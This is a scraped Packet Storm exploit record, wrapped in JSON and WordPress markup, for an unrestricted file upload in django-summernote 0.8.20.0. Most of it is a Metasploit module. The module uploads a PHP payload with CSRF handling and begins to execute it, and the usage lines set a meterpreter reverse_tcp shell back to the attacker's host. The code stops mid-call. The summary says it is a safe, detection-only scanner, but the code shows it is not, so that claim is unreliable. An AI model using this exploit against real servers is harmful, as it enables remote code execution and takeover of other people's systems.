{“lastseen”:”2026-01-28T17:51:53″,”description”:”This Metasploit Auxiliary Scanner module detects unrestricted file upload vulnerabilities in django-summernote. It targets misconfigurations where image validation depends on the Pillow library and allows non-image files to be uploaded when Pillow is…”,”published”:”2026-01-28T00:00:00″,”modified”:”2026-01-28T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Django Summernote 0.8.20.0 Unrestricted File Upload Scanner”,”source”:””,”references”:””,”id”:”PACKETSTORM:214484″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : Django Summernote 0.8.20.0 Unrestricted File Upload Scanner (Auxiliary) |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits) |\\n | # Vendor : https:\/\/djangopackages.org\/packages\/p\/django-summernote\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/214231\/\\n \\n [+] Summary : This Metasploit Auxiliary Scanner module detects unrestricted file upload vulnerabilities in django-summernote. \\n It targets misconfigurations where image validation depends on the Pillow library and allows non-image files to be uploaded when Pillow is missing. \\n The module safely scans common upload endpoints, handles CSRF protection, and confirms vulnerability by observing successful JSON responses containing uploaded file URLs. \\n It performs detection only, does not execute payloads, and is designed for safe, non-intrusive security assessment.\\n \\n [+] Usage : \\n \\n \\n use exploit\/unix\/http\/django_summernote_rce\\n set RHOSTS 192.168.1.100\\n set RPORT 80\\n set TARGETURI \/\\n set PAYLOAD php\/meterpreter\/reverse_tcp\\n set LHOST [Your_IP]\\n set LPORT 4444\\n \\n check\\n \\n exploit\\n \\n [+] POC :\\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = NormalRanking\\n \\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::FileDropper\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Django Summernote Unrestricted File Upload RCE’,\\n ‘Description’ =\\u003e %q{\\n This module exploits an unrestricted file upload vulnerability in django-summernote \\u003c= 0.8.20.0.\\n The vulnerability occurs when the ‘Pillow’ library is missing from the server environment,\\n forcing the application to use a ‘FileField’ instead of an ‘ImageField’. \\n This allows an attacker to upload arbitrary files (such as PHP shells).\\n If the media directory is misconfigured to allow script execution, Remote Code Execution (RCE) is possible.\\n },\\n ‘Author’ =\\u003e [ ‘indoushka’ ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Platform’ =\\u003e ‘php’,\\n ‘Arch’ =\\u003e ARCH_PHP,\\n ‘Targets’ =\\u003e [\\n [‘PHP Payload (Generic)’, { ‘Platform’ =\\u003e ‘php’, ‘Arch’ =\\u003e ARCH_PHP }]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DisclosureDate’ =\\u003e ‘2026-01-24’,\\n ‘References’ =\\u003e [\\n [‘URL’, ‘https:\/\/github.com\/summernote\/django-summernote’]\\n ],\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK]\\n }\\n )\\n )\\n \\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘The base path to the Django application’, ‘\/’])\\n ])\\n end\\n \\n def check\\n upload_paths = [\\n ‘\/summernote\/upload_editor_file\/’,\\n ‘\/summernote\/upload_attachment\/’,\\n ‘\/admin\/summernote\/upload_editor_file\/’\\n ]\\n \\n upload_paths.each do |path|\\n full_path = normalize_uri(target_uri.path, path)\\n res = send_request_cgi(‘method’ =\\u003e ‘GET’, ‘uri’ =\\u003e full_path)\\n \\n if res \\u0026\\u0026 (res.code == 405 || (res.code == 200 \\u0026\\u0026 res.body.include?(‘upload_editor_file’)))\\n return Exploit::CheckCode::Appears\\n end\\n end\\n Exploit::CheckCode::Safe\\n end\\n \\n def exploit\\n upload_paths = [\\n ‘\/summernote\/upload_editor_file\/’,\\n ‘\/summernote\/upload_attachment\/’,\\n ‘\/admin\/summernote\/upload_editor_file\/’\\n ]\\n \\n upload_paths.each do |path|\\n full_path = normalize_uri(target_uri.path, path)\\n print_status(\\”Checking endpoint: #{full_path}\\”)\\n \\n res = send_request_cgi(‘method’ =\\u003e ‘GET’, ‘uri’ =\\u003e full_path)\\n next unless res\\n \\n cookies = res.get_cookies\\n csrf_token = res.get_cookies_parsed[‘csrftoken’]\\u0026.first\\n \\n filename = \\”#{Rex::Text.rand_text_alpha(8)}.php\\”\\n data = Rex::MIME::Message.new\\n \\n if csrf_token\\n data.add_part(csrf_token, nil, nil, ‘form-data; name=\\”csrfmiddlewaretoken\\”‘)\\n end\\n \\n data.add_part(payload.encoded, ‘application\/x-php’, nil, \\”form-data; name=\\\\\\”files\\\\\\”; filename=\\\\\\”#{filename}\\\\\\”\\”)\\n \\n print_status(\\”Attempting to upload payload: #{filename}\\”)\\n \\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e full_path,\\n ‘ctype’ =\\u003e \\”multipart\/form-data; boundary=#{data.bound}\\”,\\n ‘cookie’ =\\u003e cookies,\\n ‘headers’ =\\u003e { ‘Referer’ =\\u003e full_path }, # Referer is often required for Django CSRF\\n ‘data’ =\\u003e data.to_s\\n })\\n \\n if res \\u0026\\u0026 res.code == 200 \\u0026\\u0026 res.headers[‘Content-Type’]\\u0026.include?(‘application\/json’)\\n begin\\n json_res = res.get_json_document\\n \\n file_url = json_res[‘files’] ? json_res[‘files’][0][‘url’] : json_res[‘url’]\\n \\n if file_url\\n print_good(\\”Payload uploaded successfully: #{file_url}\\”)\\n \\n register_file_for_cleanup(File.basename(file_url))\\n \\n print_status(\\”Executing payload via GET request…\\”)\\n send_request_cgi({\\n \\t\\t\\t\\n \\n Greetings to :============================================================\\n jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|\\n ==========================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214484″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214484\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-28T17:51:53″,”description”:”This Metasploit Auxiliary Scanner module detects unrestricted file upload vulnerabilities in django-summernote. It targets misconfigurations where image validation depends on the Pillow library and allows…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-37900","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n